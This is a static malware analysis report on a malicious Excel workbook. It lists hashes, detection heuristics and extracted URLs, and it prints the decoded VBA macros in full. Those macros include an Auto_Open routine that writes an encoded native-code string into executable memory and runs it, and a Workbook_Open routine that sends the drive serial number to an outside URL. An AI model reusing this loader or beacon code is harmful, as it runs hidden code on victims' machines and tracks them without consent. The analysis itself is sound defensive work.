Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 b2b80939a83ad7ec…

MALICIOUS

Office (OOXML) / .XLSX

Size: 200.2 KB
Created: 2022-04-14 12:05:31 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-06
MD5: 71b153f5d0b27dea7ecdcbb547ec241e
SHA-1: 32297d2c4534a75b634c5ee580d8a1d9f5ef29b1
SHA-256: b2b80939a83ad7ecd7330507313cb85f78c8cad4f446f67a49ed994fcc93dbaa
Risk score: 126

Heuristics (7)

  • VBA project inside OOXML (medium; 4 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
  • VBA project part renamed to evade filename detection (high) [OOXML_VBA_PROJECT_RENAMED]
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    Matched line in script:
        Set objFS = CreateObject("Scripting.FileSystemObject")
  • Workbook_Open macro (low) [OLE_VBA_WBOPEN]
    Matched line in script:
        Private Sub Workbook_Open()
  • Auto_Open macro (low) [OLE_VBA_AUTO]
    Matched line in script:
        Public Sub Auto_Open()
  • External hyperlinks (1) (low) [OOXML_EXTERNAL_HYPERLINKS]
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://ad.worksheets.co.kr/?WsLn=54a5e633807f3ba4622685fc9f8c8caf
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://ad.worksheets.co.kr/?WsLn=54a5e633807f3ba4622685fc9f8c8caf (document hyperlink)
    • https://ad.worksheets.co.kr/?WsLn=59b586058f06393d086f3f2d41438bb5&WsMm= (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text: OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ (in document text: OOXML body / shared strings)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8686 bytes
SHA-256: 1446591b5804586d8098a3f0e045e8b2b989dba5b7bdbacca3ac8dd0987a163a
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "mAPI"
Option Explicit

'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------

Private Const OPTION_BASE                  As Long = 0
Private Const OPTION_FLAGS                 As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES       As String = ""
Private Const PAGE_EXECUTE_RW              As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT       As Long = &H3000
Private Const MEM_RELEASE                  As Long = &H8000
Private Const ERR_OUT_OF_MEMORY            As Long = &H7
Private Const ROOTOBJECT_SIZE              As Long = &H4D948

Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object

#If VBA7 = False Then
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
    Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
    Private Const VBA_VERSION              As Long = 6

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As Long
        vtbl_AddRef As Long
        vtbl_Release As Long
        vtbl_GetTypeInfoCount As Long
        vtbl_GetTypeInfo As Long
        vtbl_GetIDsOfNames As Long
        vtbl_Invoke As Long
        RootObjectMem As Long
        HelperObject As Object
        SysFreeString As Long
        GetProcAddress As Long
        NativeCode As String
        LoaderMem As Long
        IgnoreFlag As Boolean
        VTablePtr As Long
        Kernel32Handle As Long
        RootObject As Object
        ClassFactory As Object
    End Type
#Else
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
    Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
    Private Const VBA_VERSION              As Long = 7

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As LongPtr
        vtbl_AddRef As LongPtr
        vtbl_Release As LongPtr
        vtbl_GetTypeInfoCount As LongPtr
        vtbl_GetTypeInfo As LongPtr
        vtbl_GetIDsOfNames As LongPtr
        vtbl_Invoke As LongPtr
        RootObjectMem As LongPtr
        HelperObject As Object
        SysFreeString As LongPtr
        GetProcAddress As LongPtr
        NativeCode As String
        LoaderMem As LongPtr
        IgnoreFlag As Boolean
        VTablePtr As LongPtr
        Kernel32Handle As LongPtr
        RootObject As Object
        ClassFactory As Object
    End Type
#End If

Public Sub Auto_Open()

    With m_Loader
        .NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$(  XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8  XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"

        .LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .vtbl_QueryInterface = .LoaderMem
        .VTablePtr = VarPtr(m_Loader)
        .Kernel32Handle = GetModuleHandleA("KERNEL32")
        .GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
        .SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
        Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
        Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
        .IgnoreFlag = TypeOf .RootObject Is VBA.Collection
        Set .ClassFactory = (.RootObject)
        Set .RootObject = Nothing
        VirtualFree .LoaderMem, 0, MEM_RELEASE
        Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
        Set m_VCOMObject = .ClassFactory.GetErrEx()
    End With

End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Dim objFS As Object
    On Error GoTo ExitSub
    Set objFS = CreateObject("Scripting.FileSystemObject")
    If Sheet3.[a1] <> objFS.getfile(ThisWorkbook.FullName).datecreated Then
        ThisWorkbook.FollowHyperlink "https://ad.worksheets.co.kr/?WsLn=59b586058f06393d086f3f2d41438bb5&WsMm=" & objFS.getdrive(objFS.getdrivename(Application.Path)).SerialNumber
        Sheet3.[a1] = objFS.getfile(ThisWorkbook.FullName).datecreated
    End If
ExitSub:
    Set objFS = Nothing
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F57D9841-60DB-4718-A50A-5874AA58AC20}{B9F8A873-C38F-4311-A5D7-D4127C25D2BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 7680 bytes
SHA-256: 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861

Filename: vbaProject_01.bin
Kind: vba-project
Source: OOXML VBA project: xl/printerSettings.bin
Size: 28160 bytes
SHA-256: 850a6905f18f14ff7a3001153e89ffd22fee9a7a62d5cda389005a632976076a